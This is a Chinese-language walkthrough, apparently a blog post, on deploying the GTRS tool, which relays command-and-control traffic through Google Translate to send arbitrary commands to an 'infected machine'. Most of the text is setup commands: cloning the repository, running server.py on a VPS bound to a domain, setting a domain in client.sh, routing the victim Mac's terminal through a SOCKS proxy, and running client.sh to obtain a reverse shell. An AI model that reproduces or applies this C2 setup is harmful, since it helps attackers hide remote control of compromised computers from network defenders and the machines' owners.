使用Google Translator作为代理,向受感染的计算机发送任意命令
受感染机器 ==HTTPS==>【Google Translator】==HTTP==>【C2】
在灰炮技能知识星球看到,遂实践之。
前提条件
需要一个VPS和一个域名,并绑定域名和VPS的公网ip。
免费域名可从freenom获取
如果受感染机器在国内,还需要保证其能访问https://translate.google.com/。 后文会介绍mac下终端走代理的方式。
GTRS实现过程
环境:
受感染机器: macOS
C2server: centos6/VPS
第一步:在VPS上执行server.py
[root@host ~]# git clone https://github.com/mthbernardes/GTRS
[root@host ~]# cd GTRS
此处需要用python2.7执行server.py,但是我的VPS的centos6,默认是python2.6,因此需在centos6上安装python2.7,我安装的是python2.7.15,参考的是秋水逸冰前辈的教程。
安装好后,执行server.py:
[root@host GTRS]# python2.7 server.py
第二步:在受感染机器执行client.sh
执行前,需要先在client.sh的第5行设置域名。
因为我假设受感染机器是国内的mac,此处要使其能访问https://translate.google.com/, 需要做以下设置:
以zsh为例,(mac下zsh使用的教程 >>> 教程1 | 教程2)
➜ ~ vim ~/.zshrc
添加如下代理配置:
alias proxy=’export all_proxy=socks5://127.0.0.1:1080’
alias unproxy=’unset all_proxy’
:wq保存退出
➜ ~ source ~/.zshrc
查看当前ip:
➜ ~ curl cip.cc
开启shadowssocks,绑定本地1080端口,并执行以下命令:
➜ ~ proxy
再次查看当前ip:
➜ ~ curl cip.cc
mac终端走代理成功,此时执行client.sh,成功获取反向shell
➜ GTRS git:(master) ✗ bash client.sh